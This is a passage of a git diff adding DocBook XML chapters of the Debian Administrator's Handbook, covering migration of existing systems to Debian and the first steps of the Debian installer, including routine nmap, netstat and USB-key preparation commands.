+	 <highlights> <para>
+		Any computer system overhaul should take the existing system into account. This allows reuse of available resources as much as possible and guarantees interoperability of the various elements comprising the system. This study will introduce a generic framework to follow in any migration of a computing infrastructure to Linux.
+	</para>
+	 </highlights> <section id="sect.heterogeneous-environments">
+		<title>Coexistence in Heterogeneous Environments</title>
+		 <indexterm>
+			<primary>environment</primary>
+			<secondary>heterogeneous environment</secondary>
+		</indexterm>
+		 <para>
+			Debian integrates very well in all types of existing environments and plays well with any other operating system. This near-perfect harmony comes from market pressure which demands that software publishers develop programs that follow standards. Compliance with standards allows administrators to switch out programs: clients or servers, whether free or not.
+		</para>
+		 <section>
+			<title>Integration with Windows Machines</title>
+			 <para>
+				Samba's SMB/CIFS support ensures excellent communication within a Windows context. It shares files and print queues to Windows clients and includes software that allow a Linux machine to use resources available on Windows servers.
+			</para>
+			 <sidebar> <title><emphasis>TOOL</emphasis> Samba</title>
+			 <indexterm>
+				<primary>Samba</primary>
+			</indexterm>
+			 <para>
+				The latest version of Samba can replace most of the Windows features: from those of a simple Windows NT server (authentication, files, print queues, downloading printer drivers, DFS, etc.) to the most advanced one (a domain controller compatible with Active Directory).
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Integration with OS X machines</title>
+			 <indexterm>
+				<primary>Zeroconf</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Bonjour</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Avahi</primary>
+			</indexterm>
+			 <para>
+				OS X machines provide, and are able to use, network services such as file servers and printer sharing. These services are published on the local network, which allows other machines to discover them and make use of them without any manual configuration, using the Bonjour implementation of the Zeroconf protocol suite. Debian includes another implementation, called Avahi, which provides the same functionality.
+			</para>
+			 <indexterm>
+				<primary>AFP</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>AppleShare</primary>
+			</indexterm>
+			 <para>
+				In the other direction, the Netatalk daemon can be used to provide file servers to OS X machines on the network. It implements the AFP (AppleShare) protocol as well as the required notifications so that the servers can be autodiscovered by the OS X clients.
+			</para>
+			 <indexterm>
+				<primary>AppleTalk</primary>
+			</indexterm>
+			 <para>
+				Older Mac OS networks (before OS X) used a different protocol called AppleTalk. For environments involving machines using this protocol, Netatalk also provides the AppleTalk protocol (in fact, it started as a reimplementation of that protocol). It ensures the operation of the file server and print queues, as well as time server (clock synchronization). Its router function allows interconnection with AppleTalk networks.
+			</para>
+
+		</section>
+		 <section>
+			<title>Integration with Other Linux/Unix Machines</title>
+			 <para>
+				Finally, NFS and NIS, both included, guarantee interaction with Unix systems. NFS ensures file server functionality, while NIS creates user directories. The BSD printing layer, used by most Unix systems, also allows sharing of print queues.
+			</para>
+			 <figure>
+				<title>Coexistence of Debian with OS X, Windows and Unix systems</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/existing-setup-1.png" format="PNG" width="25%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+
+		</section>
+
+	</section>
+	 <section id="sect.how-to-migrate">
+		<title>How To Migrate</title>
+		 <indexterm>
+			<primary>migration</primary>
+		</indexterm>
+		 <para>
+			In order to guarantee continuity of the services, each computer migration must be planned and executed according to the plan. This principle applies whatever the operating system used.
+		</para>
+		 <section>
+			<title>Survey and Identify Services</title>
+			 <para>
+				As simple as it seems, this step is essential. A serious administrator truly knows the principal roles of each server, but such roles can change, and sometimes experienced users may have installed “wild” services. Knowing that they exist will at least allow you to decide what to do with them, rather than delete them haphazardly.
+			</para>
+			 <para>
+				For this purpose, it is wise to inform your users of the project before migrating the server. To involve them in the project, it may be useful to install the most common free software programs on their desktops prior to migration, which they will come across again after the migration to Debian; Libre Office and the Mozilla suite are the best examples here.
+			</para>
+			 <section>
+				<title>Network and Processes</title>
+				 <indexterm>
+					<primary><command>nmap</command></primary>
+				</indexterm>
+				 <para>
+					The <command>nmap</command> tool (in the package with the same name) will quickly identify Internet services hosted by a network connected machine without even requiring to log in to it. Simply call the following command on another machine connected to the same network:
+				</para>
+				 
+<screen>
+<computeroutput>$ </computeroutput><userinput>nmap mirwiz</userinput>
+<computeroutput>Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-06 14:41 CEST
+Nmap scan report for mirwiz (192.168.1.104)
+Host is up (0.00062s latency).
+Not shown: 992 closed ports
+PORT     STATE SERVICE
+22/tcp   open  ssh
+25/tcp   open  smtp
+80/tcp   open  http
+111/tcp  open  rpcbind
+139/tcp  open  netbios-ssn
+445/tcp  open  microsoft-ds
+5666/tcp open  nrpe
+9999/tcp open  abyss
+
+Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds</computeroutput></screen>
+				 <sidebar> <title><emphasis>ALTERNATIVE</emphasis> Use <command>netstat</command> to find the list of available services</title>
+				 <para>
+					On a Linux machine, the <command>netstat -tupan</command> command will show the list of active or pending TCP sessions, as well UDP ports on which running programs are listening. This facilitates identification of services offered on the network.
+				</para>
+				 </sidebar> <sidebar> <title><emphasis>GOING FURTHER</emphasis> IPv6</title>
+				 <para>
+					Some network commands may work either with IPv4 (the default usually) or with IPv6. These include the <command>nmap</command> and <command>netstat</command> commands, but also others, such as <command>route</command> or <command>ip</command>. The convention is that this behavior is enabled by the <parameter>-6</parameter> command-line option.
+				</para>
+				 </sidebar> <para>
+					If the server is a Unix machine offering shell accounts to users, it is interesting to determine if processes are executed in the background in the absence of their owner. The command <command>ps auxw</command> displays a list of all processes with their user identity. By checking this information against the output of the <command>who</command> command, which gives a list of logged in users, it is possible to identify rogue or undeclared servers or programs running in the background. Looking at <filename>crontabs</filename> (tables listing automatic actions scheduled by users) will often provide interesting information on functions fulfilled by the server (a complete explanation of <command>cron</command> is available in <xref linkend="sect.task-scheduling-cron-atd" />).
+				</para>
+				 <para>
+					In any case, it is essential to backup your servers: this allows recovery of information after the fact, when users will report specific problems due to the migration.
+				</para>
+
+			</section>
+
+		</section>
+		 <section>
+			<title>Backing up the Configuration</title>
+			 <para>
+				It is wise to retain the configuration of every identified service in order to be able to install the equivalent on the updated server. The bare minimum is to make a backup copy of the configuration files.
+			</para>
+			 <para>
+				For Unix machines, the configuration files are usually found in <filename>/etc/</filename>, but they may be located in a sub-directory of <filename>/usr/local/</filename>. This is the case if a program has been installed from sources, rather than with a package. In some cases, one may also find them under <filename>/opt/</filename>.
+			</para>
+			 <para>
+				For data managing services (such as databases), it is strongly recommended to export the data to a standard format that will be easily imported by the new software. Such a format is usually in text mode and documented; it may be, for example, an SQL dump for a database, or an LDIF file for an LDAP server.
+			</para>
+			 <figure>
+				<title>Database backups</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/existing-setup-2.png" format="PNG" width="50%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <para>
+				Each server software is different, and it is impossible to describe all existing cases in detail. Compare the documentation for the existing and the new software to identify the exportable (thus, re-importable) portions and those which will require manual handling. Reading this book will clarify the configuration of the main Linux server programs.
+			</para>
+
+		</section>
+		 <section>
+			<title>Taking Over an Existing Debian Server</title>
+			 <indexterm>
+				<primary>recovering a Debian machine</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>exploring a Debian machine</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>taking over a Debian server</primary>
+			</indexterm>
+			 <para>
+				To effectively take over its maintenance, one may analyze a machine already running with Debian.
+			</para>
+			 <para>
+				The first file to check is <filename>/etc/debian_version</filename>, which usually contains the version number for the installed Debian system (it is part of the <emphasis>base-files</emphasis> package). If it indicates <literal><replaceable>codename</replaceable>/sid</literal>, it means that the system was updated with packages coming from one of the development distributions (either testing or unstable).
+			</para>
+			 <para>
+				The <command>apt-show-versions</command> program (from the Debian package of the same name) checks the list of installed packages and identifies the available versions. <command>aptitude</command> can also be used for these tasks, albeit in a less systematic manner.
+			</para>
+			 <para>
+				A glance at the <filename>/etc/apt/sources.list</filename> file (and <filename>/etc/apt/sources.list.d/</filename> directory) will show where the installed Debian packages likely came from. If many unknown sources appear, the administrator may choose to completely reinstall the computer's system to ensure optimal compatibility with the software provided by Debian.
+			</para>
+			 <para>
+				The <filename>sources.list</filename> file is often a good indicator: the majority of administrators keep, at least in comments, the list of APT sources that were previously used. But you should not forget that sources used in the past might have been deleted, and that some random packages grabbed on the Internet might have been manually installed (with the <command>dpkg</command> command). In this case, the machine is misleading in its appearance of “standard” Debian. This is why you should pay attention to any indication that will give away the presence of external packages (appearance of <filename>deb</filename> files in unusual directories, package version numbers with a special suffix indicating that it originated from outside the Debian project, such as <literal>ubuntu</literal> or <literal>lmde</literal>, etc.)
+			</para>
+			 <para>
+				Likewise, it is interesting to analyze the contents of the <filename>/usr/local/</filename> directory, whose purpose is to contain programs compiled and installed manually. Listing software installed in this manner is instructive, since this raises questions on the reasons for not using the corresponding Debian package, if such a package exists.
+			</para>
+			 <sidebar> <title><emphasis>QUICK LOOK</emphasis> <emphasis role="pkg">cruft</emphasis></title>
+			 <para>
+				The <emphasis role="pkg">cruft</emphasis> package proposes to list the available files that are not owned by any package. It has some filters (more or less effective, and more or less up to date) to avoid reporting some legitimate files (files generated by Debian packages, or generated configuration files not managed by <command>dpkg</command>, etc.).
+			</para>
+			 <para>
+				Be careful to not blindly delete everything that <command>cruft</command> might list!
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Installing Debian</title>
+			 <para>
+				Once all the required information on the current server is known, we can shut it down and begin to install Debian on it.
+			</para>
+			 <indexterm>
+				<primary>architecture</primary>
+			</indexterm>
+			 <para>
+				To choose the appropriate version, we must know the computer's architecture. If it is a reasonably recent PC, it is most likely to be amd64 (older PCs were usually i386). In other cases, we can narrow down the possibilities according to the previously used system.
+			</para>
+			 <para>
+				<xref linkend="tab-corresp" xrefstyle="select: label nopage" /> is not intended to be exhaustive, but may be helpful. In any case, the original documentation for the computer is the most reliable source to find this information.
+			</para>
+			 <table colsep="1" id="tab-corresp">
+				<title>Matching operating system and architecture</title>
+				 <tgroup cols="2">
+					<thead>
+						<row>
+							<entry>Operating System</entry>
+							 <entry>Architecture(s)</entry>
+
+						</row>
+
+					</thead>
+					 <tbody>
+						<row>
+							<entry>DEC Unix (OSF/1)</entry>
+							 <entry>alpha, mipsel</entry>
+
+						</row>
+						 <row>
+							<entry>HP Unix</entry>
+							 <entry>ia64, hppa</entry>
+
+						</row>
+						 <row>
+							<entry>IBM AIX</entry>
+							 <entry>powerpc</entry>
+
+						</row>
+						 <row>
+							<entry>Irix</entry>
+							 <entry>mips</entry>
+
+						</row>
+						 <row>
+							<entry>OS X</entry>
+							 <entry>amd64, powerpc, i386</entry>
+
+						</row>
+						 <row>
+							<entry>z/OS, MVS</entry>
+							 <entry>s390x, s390</entry>
+
+						</row>
+						 <row>
+							<entry>Solaris, SunOS</entry>
+							 <entry>sparc, i386, m68k</entry>
+
+						</row>
+						 <row>
+							<entry>Ultrix</entry>
+							 <entry>mips</entry>
+
+						</row>
+						 <row>
+							<entry>VMS</entry>
+							 <entry>alpha</entry>
+
+						</row>
+						 <row>
+							<entry>Windows 95/98/ME</entry>
+							 <entry>i386</entry>
+
+						</row>
+						 <row>
+							<entry>Windows NT/2000</entry>
+							 <entry>i386, alpha, ia64, mipsel</entry>
+
+						</row>
+						 <row>
+							<entry>Windows XP / Windows Server 2008</entry>
+							 <entry>i386, amd64, ia64</entry>
+
+						</row>
+						 <row>
+							<entry>Windows RT</entry>
+							 <entry>armel, armhf, arm64</entry>
+
+						</row>
+						 <row>
+							<entry>Windows Vista / Windows 7-8-10</entry>
+							 <entry>i386, amd64</entry>
+
+						</row>
+
+					</tbody>
+
+				</tgroup>
+
+			</table>
+			 <sidebar> <title><emphasis>HARDWARE</emphasis> 64 bit PC vs 32 bit PC</title>
+			 <indexterm>
+				<primary>amd64</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>i386</primary>
+			</indexterm>
+			 <para>
+				Most recent computers have 64 bit Intel or AMD processors, compatible with older 32 bit processors; the software compiled for “i386” architecture thus works. On the other hand, this compatibility mode does not fully exploit the capabilities of these new processors. This is why Debian provides the “amd64” architecture, which works for recent AMD chips as well as Intel “em64t” processors (including most of the Core series), which are very similar to AMD64.
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Installing and Configuring the Selected Services</title>
+			 <para>
+				Once Debian is installed, we must install and configure one by one all of the services that this computer must host. The new configuration must take into consideration the prior one in order to ensure a smooth transition. All the information collected in the first two steps will be useful to successfully complete this part.
+			</para>
+			 <figure>
+				<title>Install the selected services</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/existing-setup-4.png" format="PNG" width="66%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <para>
+				Prior to jumping into this exercise with both feet, it is strongly recommended that you read the remainder of this book. After that you will have a more precise understanding of how to configure the expected services.
+			</para>
+			 <para>
+			</para>
+
+		</section>
+
+	</section>
+</chapter>
+
diff --git a/tmp/cs-CZ/xml/04_installation.xml b/tmp/cs-CZ/xml/04_installation.xml
new file mode 100644
index 000000000..659941c01
--- /dev/null
+++ b/tmp/cs-CZ/xml/04_installation.xml
@@ -0,0 +1,988 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="installation" lang="cs-CZ">
+	<chapterinfo>
+		 <keywordset>
+			<keyword>Installation</keyword>
+			 <keyword>Partitioning</keyword>
+			 <keyword>Formatting</keyword>
+			 <keyword>File System</keyword>
+			 <keyword>Boot Sector</keyword>
+			 <keyword>Hardware Detection</keyword>
+
+		</keywordset>
+
+	</chapterinfo>
+	 <title>Installation</title>
+	 <highlights> <para>
+		To use Debian, you need to install it on a computer; this task is taken care of by the <emphasis>debian-installer</emphasis> program. A proper installation involves many operations. This chapter reviews them in their chronological order.
+	</para>
+	 </highlights> <indexterm>
+		<primary>installation</primary>
+		<secondary>of the system</secondary>
+	</indexterm>
+	 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> A catch-up course in the appendices</title>
+	 <para>
+		Installing a computer is always simpler when you are familiar with the way it works. If you are not, make a quick detour to <xref linkend="short-remedial-course" /> before reading this chapter.
+	</para>
+	 </sidebar> <para>
+		The installer for <emphasis role="distribution">Stretch</emphasis> is based on <command>debian-installer</command>. Its modular design enables it to work in various scenarios and allows it to evolve and adapt to changes. Despite the limitations implied by the need to support a large number of architectures, this installer is very accessible to beginners, since it assists users at each stage of the process. Automatic hardware detection, guided partitioning, and graphical user interfaces have solved most of the problems that newbies used to face in the early years of Debian.
+	</para>
+	 <indexterm>
+		<primary>installer</primary>
+	</indexterm>
+	 <indexterm>
+		<primary><command>debian-installer</command></primary>
+	</indexterm>
+	 <para>
+		Installation requires 128 MB of RAM (Random Access Memory) and at least 2 GB of hard drive space. All Falcot computers meet these criteria. Note, however, that these figures apply to the installation of a very limited system without a graphical desktop. A minimum of 512 MB of RAM and 10 GB of hard drive space are really recommended for a basic office desktop workstation.
+	</para>
+	 <sidebar> <title><emphasis>BEWARE</emphasis> Upgrading from Jessie</title>
+	 <para>
+		If you already have Debian Jessie installed on your computer, this chapter is not for you! Unlike other distributions, Debian allows updating a system from one version to the next without having to reinstall the system. Reinstalling, in addition to being unnecessary, could even be dangerous, since it could remove already installed programs.
+	</para>
+	 <para>
+		The upgrade process will be described in <xref linkend="sect.dist-upgrade" />.
+	</para>
+	 </sidebar> <section id="sect.installation-methods">
+		<title>Installation Methods</title>
+		 <para>
+			A Debian system can be installed from several types of media, as long as the BIOS of the machine allows it. You can for instance boot with a CD-ROM, a USB key, or even through a network.
+		</para>
+		 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> BIOS, the hardware/software interface</title>
+		 <indexterm>
+			<primary>BIOS</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Basic Input/Output System</primary>
+		</indexterm>
+		 <para>
+			BIOS (which stands for Basic Input/Output System) is a software that is included in the motherboard (the electronic board connecting all peripherals) and executed when the computer is booted, in order to load an operating system (via an adapted bootloader). It stays in the background to provide an interface between the hardware and the software (in our case, the Linux kernel).
+		</para>
+		 </sidebar> <section id="sect.install-cd">
+			<title>Installing from a CD-ROM/DVD-ROM</title>
+			 <para>
+				The most widely used installation method is from a CD-ROM (or DVD-ROM, which behaves exactly the same way): the computer is booted from this media, and the installation program takes over.
+			</para>
+			 <para>
+				Various CD-ROM families have different purposes: <emphasis>netinst</emphasis> (network installation) contains the installer and the base Debian system; all other programs are then downloaded. Its “image”, that is the ISO-9660 filesystem that contains the exact contents of the disk, only takes up about 150 to 280 MB (depending on architecture). On the other hand, the complete set offers all packages and allows for installation on a computer that has no Internet access; it requires around 14 DVD-ROMs (or 3 Blu-ray disks). There is no more official CD-ROMs set as they were really huge, rarely used and now most of the computers use DVD-ROMs as well as CD-ROMs. But the programs are divided among the disks according to their popularity and importance; the first disk will be sufficient for most installations, since it contains the most used softwares.
+			</para>
+			 <para>
+				There is a last type of image, known as <filename>mini.iso</filename>, which is only available as a by-product of the installer. The image only contains the minimum required to configure the network and everything else is downloaded (including parts of the installer itself, which is why those images tend to break when a new version of the installer is released). Those images can be found on the normal Debian mirrors under the <filename>dists/<replaceable>release</replaceable>/main/installer-<replaceable>arch</replaceable>/current/images/netboot/</filename> directory.
+			</para>
+			 <indexterm>
+				<primary><filename>mini.iso</filename></primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>TIP</emphasis> Multi-architecture disks</title>
+			 <para>
+				Most installation CD- and DVD-ROMs work only with a specific hardware architecture. If you wish to download the complete images, you must take care to choose those which work on the hardware of the computer on which you wish to install them.
+			</para>
+			 <para>
+				Some CD/DVD-ROM images can work on several architectures. We thus have a CD-ROM image combining the <emphasis>netinst</emphasis> images of the <emphasis>i386</emphasis> and <emphasis>amd64</emphasis> architectures.
+			</para>
+			 </sidebar> <indexterm>
+				<primary>CD-ROM</primary>
+				<secondary>installation CD-ROM</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>CD-ROM</primary>
+				<secondary><emphasis>netinst CD-ROM</emphasis></secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>DVD-ROM</primary>
+				<secondary>installation DVD-ROM</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>DVD-ROM</primary>
+				<secondary><emphasis>netinst DVD-ROM</emphasis></secondary>
+			</indexterm>
+			 <para>
+				To acquire Debian CD-ROM images, you may of course download them and burn them to disk. You may also purchase them, and, thus, provide the project with a little financial support. Check the website to see the list of DVD-ROM image vendors and download sites. <ulink type="block" url="http://www.debian.org/CD/index.html" />
+			</para>
+
+		</section>
+		 <section id="sect.install-usb">
+			<title>Booting from a USB Key</title>
+			 <indexterm>
+				<primary>USB key</primary>
+			</indexterm>
+			 <para>
+				Since most computers are able to boot from USB devices, you can also install Debian from a USB key (this is nothing more than a small flash-memory disk).
+			</para>
+			 <para>
+				The installation manual explains how to create a USB key that contains the <command>debian-installer</command>. The procedure is very simple because ISO images for i386 and amd64 are hybrid images that can boot from a CD-ROM as well as from a USB key.
+			</para>
+			 <para>
+				You must first identify the device name of the USB key (ex: <literal>/dev/sdb</literal>); the simplest means to do this is to check the messages issued by the kernel using the <command>dmesg</command> command. Then you must copy the previously downloaded ISO image (for example debian-9.0.0-amd64-netinst.iso) with the command <command>cat debian-9.0.0-amd64-netinst.iso &gt;/dev/sdb; sync</command>. This command requires administrator rights, since it accesses the USB key directly and blindly erases its content.
+			</para>
+			 <para>
+				A more detailed explanation is available in the installation manual. Among other things, it describes an alternative method of preparing a USB key that is more complex, but that allows to customize the installer's default options (those set in the kernel command line). <ulink type="block" url="http://www.debian.org/releases/stable/amd64/ch04s03.html" />
+			</para>
+
+		</section>
+		 <section id="sect.install-net">
+			<title>Installing through Network Booting</title>
+			 <indexterm>
+				<primary>installation</primary>
+				<secondary><emphasis>netboot installation</emphasis></secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>installation</primary>
+				<secondary><emphasis>PXE installation</emphasis></secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>installation</primary>
+				<secondary><emphasis>TFTP installation</emphasis></secondary>
+			</indexterm>
+			 <para>
+				Many BIOSes allow booting directly from the network by downloading a kernel and a minimal filesystem image. This method (which has several names, such as <acronym>PXE</acronym> or <acronym>TFTP</acronym> boot) can be a life-saver if the computer does not have a CD-ROM reader, or if the BIOS can't boot from such media.
+			</para>
+			 <para>
+				This installation method works in two steps. First, while booting the computer, the BIOS (or the network card) issues a BOOTP/DHCP request to automatically acquire an IP address. When a BOOTP or DHCP server returns a response, it includes a filename, as well as network settings. After having configured the network, the client computer then issues a TFTP (Trivial File Transfer Protocol) request for a file whose name was previously indicated. Once this file is acquired, it is executed as though it were a bootloader. This then launches the Debian installation program, which is executed as though it were running from the hard drive, a CD-ROM, or a USB key.
+			</para>
+			 <para>
+				All the details of this method are available in the installation guide (“Preparing files for TFTP Net Booting” section). <ulink type="block" url="http://www.debian.org/releases/stable/amd64/ch05s01.html#boot-tftp" /> <ulink type="block" url="http://www.debian.org/releases/stable/amd64/ch04s05.html" />
+			</para>
+
+		</section>
+		 <section id="sect.install-auto">
+			<title>Other Installation Methods</title>
+			 <para>
+				When we have to deploy customized installations for a large number of computers, we generally choose an automated rather than a manual installation method. Depending on the situation and the complexity of the installations to be made, we can use FAI (Fully Automatic Installer, described in <xref linkend="sect.fai" />), or even a customized installation DVD with preseeding (see <xref linkend="sect.d-i-preseeding" />).
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.installation-steps">
+		<title>Installing, Step by Step</title>
+		 <section id="sect.install-boot">
+			<title>Booting and Starting the Installer</title>
+			 <para>
+				Once the BIOS has begun booting from the CD- or DVD-ROM, the Isolinux bootloader menu appears. At this stage, the Linux kernel is not yet loaded; this menu allows you to choose the kernel to boot and enter possible parameters to be transferred to it in the process.
+			</para>
+			 <para>
+				For a standard installation, you only need to choose “Install” or “Graphical install” (with the arrow keys), then press the <keycap>Enter</keycap> key to initiate the remainder of the installation process. If the DVD-ROM is a “Multi-arch” disk, and the machine has an Intel or AMD 64 bit processor, those menu options enable the installation of the 64 bit variant (<emphasis>amd64</emphasis>) and the installation of the 32 bit variant remains available in a dedicated sub-menu (“32-bit install options”). If you have a 32 bit processor, you don't get a choice and the menu entries install the 32 bit variant (<emphasis>i386</emphasis>).
+			</para>
+			 <sidebar> <title><emphasis>GOING FURTHER</emphasis> 32 or 64 bits?</title>
+			 <indexterm>
+				<primary>PAE</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Physical Address Extension</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>32/64 bits, choice</primary>
+			</indexterm>
+			 <para>
+				The fundamental difference between 32 and 64 bit systems is the size of memory addresses. In theory, a 32 bit system can not work with more than 4 GB of RAM (2<superscript>32</superscript> bytes). In practice, it is possible to work around this limitation by using the <literal>686-pae</literal> kernel variant, so long as the processor handles the PAE (Physical Address Extension) functionality. Using it does have a notable influence on system performance, however. This is why it is useful to use the 64 bit mode on a server with a large amount of RAM.
+			</para>
+			 <para>
+				For an office computer (where a few percent difference in performance is negligible), you must keep in mind that some proprietary programs are not available in 64 bit versions (such as Skype, for example). It is technically possible to make them work on 64 bit systems, but you have to install the 32 bit versions of all the necessary libraries (see <xref linkend="sect.multi-arch" />), and sometimes to use <command>setarch</command> or <command>linux32</command> (in the <emphasis role="pkg">util-linux</emphasis> package) to trick applications regarding the nature of the system. <indexterm><primary><command>setarch</command></primary></indexterm> <indexterm><primary><command>linux32</command></primary></indexterm>
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>IN PRACTICE</emphasis> Installation alongside an existing Windows system</title>
+			 <indexterm>
+				<primary>dual boot</primary>
+			</indexterm>
+			 <para>
+				If the computer is already running Windows, it is not necessary to delete the system in order to install Debian. You can have both systems at once, each installed on a separate disk or partition, and choose which to start when booting the computer. This configuration is often called “dual boot”, and the Debian installation system can set it up. This is done during the hard drive partitioning stage of installation and while setting up the bootloader (see the sidebars <xref linkend="sidebar.shrinking-partition" /> and <xref linkend="sidebar.bootloader-dual-boot" />).
+			</para>
+			 <para>
+				If you already have a working Windows system, you can even avoid using a CD-ROM; Debian offers a Windows program that will download a light Debian installer and set it up on the hard disk. You then only need to reboot the computer and choose between normal Windows boot or booting the installation program. You can also find it on a dedicated website with a rather explicit name… <ulink type="block" url="http://ftp.debian.org/debian/tools/win32-loader/stable/" /> <ulink type="block" url="http://www.goodbye-microsoft.com/" />
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Bootloader</title>
+			 <indexterm>
+				<primary>loader</primary>
+				<secondary>bootloader</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>bootloader</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>boot</primary>
+				<secondary>loader</secondary>
+			</indexterm>
+			 <para>
+				The bootloader is a low-level program that is responsible for booting the Linux kernel just after the BIOS passes off its control. To handle this task, it must be able to locate the Linux kernel to boot on the disk. On the i386 and amd64 architectures, the two most used programs to perform this task are LILO, the older of the two, and GRUB, its modern replacement. Isolinux and Syslinux are alternatives frequently used to boot from removable media.
+			</para>
+			 </sidebar> <para>
+				Each menu entry hides a specific boot command line, which can be configured as needed by pressing the <keycap>TAB</keycap> key before validating the entry and booting. The “Help” menu entry displays the old command line interface, where the <keycap>F1</keycap> to <keycap>F10</keycap> keys display different help screens detailing the various options available at the prompt. You will rarely need to use this option except in very specific cases.
+			</para>
+			 <para>
+				The “expert” mode (accessible in the “Advanced options” menu) details all possible options in the process of installation, and allows navigation between the various steps without them happening automatically in sequence. Be careful, this very verbose mode can be confusing due to the multitude of configuration choices that it offers.
+			</para>
+			 <figure>
+				<title>Boot screen</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/inst-boot.png" format="PNG" scalefit="1" width="65%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <para>
+				Once booted, the installation program guides you step by step throughout the process. This section presents each of these steps in detail. Here we follow the process of an installation from an amd64 DVD-ROM (more specifically, the rc3 version of the installer for Stretch); <emphasis>netinst</emphasis> installations, as well as the final release of the installer, may look slightly different. We will also address installation in graphical mode, but the only difference from “classic” (text-mode) installation is in the visual appearance.
+			</para>
+
+		</section>
+		 <section id="sect.install-lang">
+			<title>Selecting the language</title>
+			 <indexterm>
+				<primary>choice</primary>
+				<secondary>of language</secondary>
+			</indexterm>
+			 <para>
+				The installation program begins in English, but the first step allows the user to choose the language that will be used in the rest of the process. Choosing French, for example, will provide an installation entirely translated into French (and a system configured in French as a result). This choice is also used to define more relevant default choices in subsequent stages (notably the keyboard layout).
+			</para>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Navigating with the keyboard</title>
+			 <para>
+				Some steps in the installation process require you to enter information. These screens have several areas that may “have focus” (text entry area, checkboxes, list of choices, OK and Cancel buttons), and the <keycap>TAB</keycap> key allows you to move from one to another.
+			</para>
+			 <para>
+				In graphical mode, you can use the mouse as you would normally on an installed graphical desktop.
+			</para>
+			 </sidebar> <figure role="flow.inline">
+				<title>Selecting the language</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/inst-lang.png" format="PNG" scalefit="1" width="50%" />
+					</imageobject>
+
+				</mediaobject>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/inst-lang-txt.png" format="PNG" scalefit="1" width="50%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+
+		</section>
+		 <section id="sect.install-country">
+			<title>Selecting the country</title>
+			 <indexterm>
+				<primary>choice</primary>
+				<secondary>of country</secondary>
+			</indexterm>
+			 <para>
+				The second step consists in choosing your country. Combined with the language, this information enables the program to offer the most appropriate keyboard layout. This will also influence the configuration of the time zone. In the United States, a standard QWERTY keyboard is suggested, and a choice of appropriate time zones is offered.
+			</para>
+			 <figure role="flow.inline">
+				<title>Selecting the country</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/inst-country.png" format="PNG" scalefit="1" width="50%" />
+					</imageobject>
+
+				</mediaobject>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/inst-country-txt.png" format="PNG" scalefit="1" width="50%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+
+		</section>
+		 <section id="sect.install-keyboard">
+			<title>Selecting the keyboard layout</title>
+			 <indexterm>
+				<primary>keyboard layout</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>layout, keyboard</primary>
+			</indexterm>
+			 <para>
+				The proposed “American English” keyboard corresponds to the usual QWERTY layout.
+			</para>
+			 <figure role="flow.inline">
+				<title>Choice of keyboard</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/inst-keyboard.png" format="PNG" scalefit="1" width="50%" />
+					</imageobject>
+
+				</mediaobject>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/inst-keyboard-txt.png" format="PNG" scalefit="1" width="50%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+
+		</section>
+		 <section id="sect.install-detect-hardware">
+			<title>Detecting Hardware</title>
+			 <para>
+				This step is completely automatic in the vast majority of cases. The installer detects your hardware, and tries to identify the CD-ROM drive used in order to access its content. It loads the modules corresponding to the various hardware components detected, and then “mounts” the CD-ROM in order to read it. The previous steps were completely contained in the boot image included on the CD, a file of limited size and loaded into memory by the BIOS when booting from the CD.
+			</para>
+			 <para>
+				The installer can work with the vast majority of drives, especially standard ATAPI peripherals (sometimes called IDE and EIDE). However, if detection of the CD-ROM reader fails, the installer offers the choice to load a kernel module (for instance from a USB key) corresponding to the CD-ROM driver.
+			</para>
+
+		</section>
+		 <section id="sect.install-load-components">
+			<title>Loading Components</title>
+			 <para>
